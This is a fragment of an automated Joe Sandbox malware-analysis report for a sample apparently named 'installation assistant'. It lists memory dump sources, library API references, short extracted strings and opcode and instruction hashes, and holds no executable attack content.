                                        • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                        • Instruction Fuzzy Hash: 35419231605785EFDF128F60C490BEABBE2FF55208F04442EE46A57750CB766945CB91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$LuJ
                                        • API String ID: 3519838083-205571748
                                        • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                        • Instruction ID: 4d6dd58909168e71b4325fda5e4b8ff071135486d88481da5b90a9c81a479523
                                        • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                        • Instruction Fuzzy Hash: 9F01A1B2E01249DADB10DF9988906AEF7B4FF65318F40942EE06DE3A40C3345904CB55
                                        APIs
                                        • _free.LIBCMT ref: 6C0DDD49
                                        • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C0DA63A,?,00000004,?,4B42FCB6,?,?,6C0CF78C,4B42FCB6,?), ref: 6C0DDD85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: AllocHeap_free
                                        • String ID: 8Q
                                        • API String ID: 1080816511-4022487301
                                        • Opcode ID: 652ca45f5bb6703e4e5579b31cd70b891d78aba6cc3b8bd9edb551f8729bc602
                                        • Instruction ID: 9cf0026e03580855b02e577096cdf8004fdcb2cca32ad95eb297dc8ce1872ceb
                                        • Opcode Fuzzy Hash: 652ca45f5bb6703e4e5579b31cd70b891d78aba6cc3b8bd9edb551f8729bc602
                                        • Instruction Fuzzy Hash: DDF04F32645319769F211E6AA844B9E37E89FC3B68B274115E9249BA90DB30F40189F1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: p/K$J
                                        • API String ID: 3519838083-2069324279
                                        • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                        • Instruction ID: dc670feef65410c52898fd7669ef59e975f9f69f993aa7afea587dedf1b198f0
                                        • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                        • Instruction Fuzzy Hash: F501BCB2A117119FD724CF59C5143AAB7F4EF55729F10C85E9062A3B80C7F8A5088BA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C13AFCC
                                          • Part of subcall function 6C13A4D1: __EH_prolog.LIBCMT ref: 6C13A4D6
                                          • Part of subcall function 6C13914B: __EH_prolog.LIBCMT ref: 6C139150
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: J$0J
                                        • API String ID: 3519838083-2882003284
                                        • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                        • Instruction ID: 21ebe18acc8688e5cc9bd00377343b511f422ea6dc83ace57fc33b26cb645cd2
                                        • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                        • Instruction Fuzzy Hash: 570105B1804B51CFC325CF55C4A428AFBF0BB15308F90C95EC0AA57B50D7B8A508CB68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D)K$H)K$P)K$T)K
                                        • API String ID: 0-2262112463
                                        • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                        • Instruction ID: 7e99f677b11316a0829db5dc2e033ba2961095fea22eede71beb41eb2dc6138f
                                        • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                        • Instruction Fuzzy Hash: 6A51C0B1A042099BCF01CF9CD840BDEB7B1AF1531CF50445AEC7167A91DB76A9BACB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (?K$8?K$H?K$CK
                                        • API String ID: 0-3450752836
                                        • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                        • Instruction ID: 5baa902c0dbc296ddb65b0bd57a156b1413a01b6e5246eccdfdfc1f14933c543
                                        • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                        • Instruction Fuzzy Hash: A4F030B15017009FC360CF05D54879BF7F4EB51749F50C91EE09A9BA40D3B8A5088FB8